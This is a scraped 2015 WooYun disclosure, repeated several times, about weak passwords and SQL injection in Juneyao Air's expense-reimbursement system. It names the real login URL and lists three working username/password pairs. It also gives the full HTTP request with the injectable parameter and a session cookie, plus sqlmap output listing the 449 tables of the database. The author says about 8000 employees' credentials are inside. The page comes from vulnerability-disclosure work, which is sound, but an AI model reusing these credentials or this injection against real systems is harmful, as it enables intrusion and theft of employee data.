吉祥航空某站弱口令和SQL注入漏洞合集（涉及12个库，449个表）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139595

漏洞标题：吉祥航空某站弱口令和SQL注入漏洞合集（涉及12个库，449个表）

漏洞作者： Xmyth_夏洛克

提交时间：2015-09-07 20:54

修复时间：2015-10-23 15:44

公开时间：2015-10-23 15:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-07：细节已通知厂商并且等待厂商处理中
2015-09-08：厂商已经确认，细节仅向厂商公开
2015-09-18：细节向核心白帽子及相关领域专家公开
2015-09-28：细节向普通白帽子公开
2015-10-08：细节向实习白帽子公开
2015-10-23：细节向公众公开

简要描述：

23333333

详细说明：

URL:
费用报销系统后台登陆页面
http://expense.juneyaoair.com:8080/Frame/login.aspx

跑字典
三个账号被爆出来

zhanghong/123456
zhangjun/123456
liulei/123456
登陆系统

可查看报销信息

漏洞证明：

发消息页面的查询存在注入，

POST /publicpage/PubOpenListPage.aspx?ac=getdata&UserSqlPar=&q=%20AND%20text%20LIKE%20%27%27%25123%25%27%27%20%20&key=410402&u=3268 HTTP/1.1
Host: expense.juneyaoair.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://expense.juneyaoair.com:8080/publicPage/PubOpenListPage.aspx?key=410402&SourceWhere=&IsSingle=0&IsGetStr=1&rand=1441625347394
Content-Length: 45
Cookie: ASP.NET_SessionId=cxycaq55bf3db1550s5awdjk; ERCookie=iUserID=3268&cUserCode=zhanghong&cUserName=%e5%bc%a0%e7%ba%a2&cCredit=0.00&DepartmentName=%e8%88%aa%e6%9d
%90%e7%ae%a1%e7%90%86%e5%a4%84&DepartmentID=36&DepartmentCode=010502&CompanyIDList=&CompanyCodeList=&RoleIDList=2%2c266&RoleCodeList=002%2c266&LanguageID=1&s=G3a0FvOSXESM/
+tGAwidzZ4KVf3NqYb6&Title=&currentCompId=1&CompanyIDList2=1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
pageIndex=0&pageSize=10&sortField=&sortOrder=

参数q存在注入
sqlmap跑,涉及12个库

当前数据库有400多个表

Database: EXPENSE
[449 tables]
+--------------------------------+
| AFR_AbNormalDetail_CZ          |
| AFR_AbNormalDetail_SK          |
| AFR_AbNormalDetail_Sum         |
| AFR_AbNormalMain               |
| AFR_AbNormaldetail_bak         |
| AFR_AbNormaldetail_bak         |
| AFR_CusDetail_CW               |
| AFR_CusDetail_CW               |
| AFR_CusDetail_CZ               |
| AFR_CusDetail_FK               |
| AFR_CusDetail_SK               |
| AFR_CusMain                    |
| AFR_FixedDetail_CW             |
| AFR_FixedDetail_CW             |
| AFR_FixedDetail_CZ             |
| AFR_FixedDetail_FK             |
| AFR_FixedDetail_SK             |
| AFR_FixedMain                  |
| AFR_MarketingDetail_CW         |
| AFR_MarketingDetail_CW         |
| AFR_MarketingDetail_CZ         |
| AFR_MarketingDetail_FK         |
| AFR_MarketingDetail_SK         |
| AFR_MarketingMain              |
| AFR_NormalDetail_CW            |
| AFR_NormalDetail_CW            |
| AFR_NormalDetail_CZ            |
| AFR_NormalDetail_FK            |
| AFR_NormalDetail_SK            |
| AFR_NormalDetail_Sum           |
| AFR_NormalMain                 |
| AFR_OfficeDetail_CW            |
| AFR_OfficeDetail_CW            |
| AFR_OfficeDetail_CZ            |
| AFR_OfficeDetail_FK            |
| AFR_OfficeDetail_SK            |
| AFR_OfficeMain                 |
| AFR_ProjectDetail_CW           |
| AFR_ProjectDetail_CW           |
| AFR_ProjectDetail_CZ           |
| AFR_ProjectDetail_FK           |
| AFR_ProjectDetail_SK           |
| AFR_ProjectDetail_Sum          |
| AFR_ProjectMain                |
| AFR_PublicNormalDetail_CZ      |
| AFR_PublicNormalDetail_CZ      |
| AFR_PublicNormalDetail_SK      |
| AFR_PublicNormalMain           |
| AFR_PurDetail_CW               |
| AFR_PurDetail_CW               |
| AFR_PurDetail_CZ               |
| AFR_PurDetail_FK               |
| AFR_PurDetail_SK               |
| AFR_PurMain                    |
| AFR_ServeDetail_CW             |
| AFR_ServeDetail_CW             |
| AFR_ServeDetail_CZ             |
| AFR_ServeDetail_SK             |
| AFR_ServeDetail_Sum            |
| AFR_ServeMain                  |
| AFR_TravelDetail_BZ            |
| AFR_TravelDetail_BZ            |
| AFR_TravelDetail_CW            |
| AFR_TravelDetail_CZ            |
| AFR_TravelDetail_FK            |
| AFR_TravelDetail_SK            |
| AFR_TravelDetail_Sum           |
| AFR_TravelDetail_ZS            |
| AFR_TravelDetail_dy            |
| AFR_TravelMain                 |
| AFR_VehicleDetail_CW           |
| AFR_VehicleDetail_CW           |
| AFR_VehicleDetail_CZ           |
| AFR_VehicleDetail_FK           |
| AFR_VehicleDetail_SK           |
| AFR_VehicleMain                |
| BorrowDetail_SK                |
| BorrowDetail_SK                |
| BorrowMain                     |
| Borrow_BackDetail              |
| Borrow_BackMain                |
| Borrow_BackOffLineDetail       |
| Borrow_BackOffLineMain         |
| Borrow_V_Info                  |
| Brrow_Report_Where             |
| BudAdjustDetail                |
| BudAdjustMain                  |
| BudConfig                      |
| BudPeriod                      |
| BudPeriodType                  |
| BudPeriodYear                  |
| BudPlanChangeLog               |
| BudPlanMain_Test               |
| BudPlanMain_Test               |
| BudPlan_Test                   |
| BudPlan_Test                   |
| BudSolutionMap                 |
| BudSolutionMap                 |
| Bud_Bill_SqlField              |
| Bud_Bill_SqlField              |
| Bud_DeptMergeDetail            |
| Bud_DeptMergeMain              |
| Bud_MappingColumn              |
| Bud_MappingDetail              |
| Bud_MappingMain                |
| Bud_Script                     |
| Bud_SpecialApproveDetail_CZ    |
| Bud_SpecialApproveDetail_CZ    |
| Bud_SpecialApproveMain         |
| Bud_StyleType_Bill             |
| Bud_StyleType_Bill             |
| Bud_StyleType_WDL              |
| Bud_StyleType_WDL              |
| Bud_Style_Cell_Solu            |
| Bud_Style_Cell_Solu            |
| Bud_Style_Cell_Solu            |
| Bud_Style_File                 |
| Bud_Style_Navigation           |
| Bud_Style_Period               |
| Bud_Style_User                 |
| Bud_Style_WDGroupDetail        |
| Bud_Style_WDGroupDetail        |
| Bud_Style_WDMap                |
| Bud_Style_WD_CJ                |
| Bud_V_Plan                     |
| Bud_WDL                        |
| Bud_WDL                        |
| EB_Area                        |
| EB_BankFileConfig              |
| EB_BankFileConfig              |
| EB_CashTable                   |
| EB_Code                        |
| EB_CostType                    |
| EB_Currency                    |
| EB_CusContactAdd               |
| EB_CusContactAdd               |
| EB_Customer                    |
| EB_CustomerType                |
| EB_DateDay                     |
| EB_DateMonth                   |
| EB_DateYear                    |
| EB_Document                    |
| EB_FileUploadLog               |
| EB_IndustryType                |
| EB_InfoMain                    |
| EB_InfoMain                    |
| EB_ItemAgreeMentDetail_CZ      |
| EB_ItemAgreeMentDetail_CZ      |
| EB_ItemAgreeMentDetail_CZ      |
| EB_ItemAgreeMentMain           |
| EB_ItemStartDetail             |
| EB_ItemStartMain               |
| EB_Job                         |
| EB_PaymentType                 |
| EB_PrinterList                 |
| EB_RateAdjustLog               |
| EB_ReimbStandard               |
| EB_SZXM                        |
| EB_SZ_KM                       |
| EB_SubsidyStandard             |
| EB_SuppContact                 |
| EB_Supplier                    |
| EB_SupplierType                |
| EB_TravelBT                    |
| EB_TravelCW                    |
| EB_TravelZSBZ                  |
| FAGL_CashTable                 |
| Fa_CollectionCheckDetail       |
| Fa_CollectionCheckMain         |
| Fa_CollectionDetail            |
| Fa_CollectionMain              |
| Fa_GLBooks                     |
| Fa_GLCodeConfigDetail          |
| Fa_GLCodeConfigMain            |
| Fa_GLCodeMapMain               |
| Fa_GLCodeMapMain               |
| Fa_GLDataSource                |
| Fa_GLDsign                     |
| Fa_GLExcelImport               |
| Fa_GLKisVoucherError           |
| Fa_GLKisVoucherError           |
| Fa_GLMainSql                   |
| Fa_GLRPCompayS                 |
| Fa_GLRPDetail_Back             |
| Fa_GLRPDetail_Back             |
| Fa_GLRPMain_Back               |
| Fa_GLRPMain_Back               |
| Fa_GLServers                   |
| Fa_GLUFaccvouchError           |
| Fa_GLUFaccvouchError           |
| Fa_GLVoucherTemplate           |
| Fa_GetPricePolicy              |
| Fa_OtherPayDetail_CZ           |
| Fa_OtherPayDetail_CZ           |
| Fa_OtherPayMain                |
| Fa_PayMoneyDetail_CZ           |
| Fa_PayMoneyDetail_CZ           |
| Fa_PayMoneyDetail_SK           |
| Fa_PayMoneyMain                |
| Fa_PaymentCheckDetail          |
| Fa_PaymentCheckMain            |
| Fa_PaymentDetail               |
| Fa_PaymentMain                 |
| Fa_Test                        |
| Fa_V_FKDetail                  |
| Fa_VoucherTmpToGL              |
| OA_ItemDocumentMain            |
| OA_Overtime                    |
| OA_RenovateMain                |
| OA_ServiceList                 |
| OA_TravelRequest               |
| OA_VacationMain2               |
| OA_VacationMain2               |
| Per_AddedMenu                  |
| Project_Doc                    |
| Project_Mediate                |
| Project_StartDetail_His        |
| Project_StartDetail_His        |
| Project_StartMain              |
| Project_Step                   |
| Project_TaskPlanDetail         |
| Project_TaskPlanMain           |
| Project_TelnetServiceRecord    |
| Project_VS_Doc                 |
| Report_V_BaseApport            |
| Report_V_CW                    |
| Report_V_Req                   |
| Report_V_RetApprove            |
| Report_V_SR                    |
| Report_V_bxx                   |
| Report_V_travel                |
| Report_V_wb_item               |
| Req_CusDetail_JK               |
| Req_CusDetail_JK               |
| Req_CusMain                    |
| Req_FixedDetail_JK             |
| Req_FixedDetail_JK             |
| Req_FixedMain                  |
| Req_MarketingDetail_JK         |
| Req_MarketingDetail_JK         |
| Req_MarketingMain              |
| Req_NormalDetail_JK            |
| Req_NormalDetail_JK            |
| Req_NormalMain                 |
| Req_OfficeDetail_JK            |
| Req_OfficeDetail_JK            |
| Req_OfficeMain                 |
| Req_ProjectDetail_JK           |
| Req_ProjectDetail_JK           |
| Req_ProjectMain                |
| Req_PurDetail                  |
| Req_PurMain                    |
| Req_ServeDetail                |
| Req_ServeMain                  |
| Req_TravelDetail_JK            |
| Req_TravelDetail_JK            |
| Req_TravelDetail_ZS            |
| Req_TravelMain                 |
| Req_VehicleDetail_JK           |
| Req_VehicleDetail_JK           |
| Req_VehicleMain                |
| SSP_Book                       |
| SSP_FYType                     |
| SSP_UploadData                 |
| SSP_UploadFile                 |
| SSP_User                       |
| Sa_SRDetail                    |
| Sa_SRMain                      |
| Sys_Alert                      |
| Sys_AlertVSRole                |
| Sys_ApproveAllowButton         |
| Sys_ApproveBillApproveLog      |
| Sys_ApproveCheckItemBeforePass |
| Sys_ApproveFlowList            |
| Sys_ApproveMailSend            |
| Sys_ApproveSubAccess           |
| Sys_ApproveSubCondition        |
| Sys_ApproveSubitem             |
| Sys_ApproveWaiteApproveList    |
| Sys_ApproveedAllowEditCols     |
| Sys_BDCheck                    |
| Sys_BillHelperMsg              |
| Sys_BillHelperMsgVsBill        |
| Sys_BillHelperMsgVsRole        |
| Sys_BillPrintList              |
| Sys_BillVSReport               |
| Sys_Company                    |
| Sys_Config                     |
| Sys_CopyDetail                 |
| Sys_CopyMain                   |
| Sys_Credit                     |
| Sys_CreditVSobject             |
| Sys_CtrCompetenceAccess        |
| Sys_CtrCompetenceDetail        |
| Sys_CtrCompetenceMain          |
| Sys_CtrJsCompetenceAccess      |
| Sys_CtrJsCompetenceCondition   |
| Sys_CtrJsCompetenceDetail      |
| Sys_DataCheckItem              |
| Sys_DataCheckVsToolBar         |
| Sys_DataCompetenceAccess       |
| Sys_DataCompetenceBaseVsBill   |
| Sys_DataCompetenceCondition    |
| Sys_DataCompetenceDetail       |
| Sys_DefineColConfig            |
| Sys_Dept                       |
| Sys_DeskPanel                  |
| Sys_DeskPanelVSRole            |
| Sys_Dic                        |
| Sys_ExchangeRate               |
| Sys_FeedBack                   |
| Sys_Fn                         |
| Sys_GridDetail                 |
| Sys_GridMain                   |
| Sys_ImportDetail               |
| Sys_ImportMain                 |
| Sys_ImportValidItem            |
| Sys_InfoMain                   |
| Sys_InfoMain                   |
| Sys_LanguageDetail             |
| Sys_LanguageDetail             |
| Sys_LogForBDError              |
| Sys_LogForBud                  |
| Sys_LogForGL                   |
| Sys_LogForSaveBackUp           |
| Sys_LogForSaveBackUp           |
| Sys_LogForSqlEvent             |
| Sys_LogForWF                   |
| Sys_Log_11                     |
| Sys_Log_11                     |
| Sys_Log_12                     |
| Sys_Log_13                     |
| Sys_Log_14                     |
| Sys_MaxBillID                  |
| Sys_Menu                       |
| Sys_Message                    |
| Sys_MessageSendAccount         |
| Sys_MessageSendLog             |
| Sys_MessageSendMode            |
| Sys_MessageSetting             |
| Sys_MessageTask                |
| Sys_MessageType                |
| Sys_MessageVSReciver           |
| Sys_Num                        |
| Sys_PageDetail                 |
| Sys_PageMain                   |
| Sys_ProgramList                |
| Sys_PubPageForList             |
| Sys_QFieldHideVSUid            |
| Sys_QTemplateDetail            |
| Sys_QTemplateDetail            |
| Sys_QTemplateMain              |
| Sys_QueryPageDetail            |
| Sys_QueryPageMain              |
| Sys_Resource                   |
| Sys_ResourceType               |
| Sys_Role                       |
| Sys_RoleVSAction               |
| Sys_RoleVSSolution             |
| Sys_RoleVsBillColumn           |
| Sys_RoleVsCompany              |
| Sys_SQLFromColNameMatch        |
| Sys_SQLFromPartDetail          |
| Sys_SQLFromPartMain            |
| Sys_SQLFromPartType            |
| Sys_SQLWhereDetail             |
| Sys_SQLWhereType               |
| Sys_SSOConfig                  |
| Sys_SecondActionSql            |
| Sys_SecondProcessAccess        |
| Sys_SysNoRules                 |
| Sys_ToolBarList                |
| Sys_ToolBarVSBill              |
| Sys_UserVSDept                 |
| Sys_UserVSJob                  |
| Sys_UserVSRole                 |
| Sys_UserVsBillColumn           |
| Sys_V_AllBillStatus            |
| Sys_V_ApproveList              |
| Sys_V_Area                     |
| Sys_V_Code                     |
| Sys_V_CostType                 |
| Sys_V_CtrCompetence            |
| Sys_V_Dept_VS_User             |
| Sys_V_Dept_VS_User             |
| Sys_V_ItemDocument             |
| Sys_V_ItemDocument             |
| Sys_V_ItemStart                |
| Sys_V_Job                      |
| Sys_V_Menu                     |
| Sys_V_PaymentList              |
| Sys_V_Period                   |
| Sys_V_RoleVSUser               |
| Sys_V_Role_VS_User             |
| Sys_V_SZXM                     |
| Sys_V_TravelFor_RP             |
| Sys_V_TravelUnionAll           |
| Sys_V_UserInfo                 |
| Sys_V_UserRoleDept             |
| Sys_V_WFStepAccess             |
| Sys_WFAllowEditColsBackUp      |
| Sys_WFAllowEditColsBackUp      |
| Sys_WFAppOpinion               |
| Sys_WFApproveLog               |
| Sys_WFBillVSFlow               |
| Sys_WFCheckList                |
| Sys_WFConsign                  |
| Sys_WFDic                      |
| Sys_WFEventList                |
| Sys_WFFlowType                 |
| Sys_WFFlowVSCheck              |
| Sys_WFFlowVSEvent              |
| Sys_WFMailCCUser               |
| Sys_WFMailTempVSFlow           |
| Sys_WFMailTemplateDetail       |
| Sys_WFMailTemplateDetail       |
| Sys_WFMonitorLog               |
| Sys_WFStepAccessDynamic        |
| Sys_WFStepAccessDynamic        |
| Sys_WFStepAccessDynamic        |
| Sys_WFStepDynamic              |
| Sys_WFStepRelation             |
| Sys_WFTransferApp              |
| Sys_WFWaiteApprove             |
| Sys_WFWebPageDetail            |
| Sys_WFWebPageMain              |
| Sys_Website                    |
| Test_List                      |
| Test_SetBillCount              |
| Tran_CenterError               |
| Tran_EB_Code                   |
| Tran_NC_ARAP_DJFB              |
| Tran_NC_ARAP_DJZB              |
| Tran_Sys_Dept                  |
| Tran_Sys_Role                  |
| Tran_Sys_User                  |
| V_AFR_TravelDetail             |
| Z_JiShuLevel                   |
| aaa                            |
| aaa                            |
| bbb                            |
| nc                             |
| sys_MessageReciverType         |
| sys_PageDataSourceSql          |
| sys_user_bak                   |
| sys_user_bak                   |
| tmp_user                       |
| u_tmp                          |
| 期初借款                           |
+--------------------------------+

8000多个员工的信息包括账号密码应该都在里面，就不证明了

修复方案：

这么多数据，并没有脱裤，求20rank！！！

版权声明：转载请注明来源 Xmyth_夏洛克@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-09-08 15:43

厂商回复：

漏洞已经确认

漏洞评价：

2015-09-07 21:11 | 牛小帅 ( 普通白帽子 | Rank:433 漏洞数:100 | 什么狗屁爱，生活已乱套！人的一生中，...)

喝了炫迈是吧，听不下来啊
2015-09-07 21:11 | 牛小帅 ( 普通白帽子 | Rank:433 漏洞数:100 | 什么狗屁爱，生活已乱套！人的一生中，...)

嚼
2015-09-07 21:12 | Xmyth_夏洛克 ( 普通白帽子 | Rank:940 漏洞数:111 | 啥都不会)

@牛小帅根本停不下来

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139595

漏洞标题：吉祥航空某站弱口令和SQL注入漏洞合集（涉及12个库，449个表）

相关厂商：juneyaoair.com

漏洞作者： Xmyth_夏洛克

提交时间：2015-09-07 20:54

修复时间：2015-10-23 15:44

公开时间：2015-10-23 15:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Xmyth_夏洛克@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139595

漏洞标题：吉祥航空某站弱口令和SQL注入漏洞合集（涉及12个库，449个表）

相关厂商：juneyaoair.com

漏洞作者： Xmyth_夏洛克

提交时间：2015-09-07 20:54

修复时间：2015-10-23 15:44

公开时间：2015-10-23 15:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0139595"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Xmyth_夏洛克@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：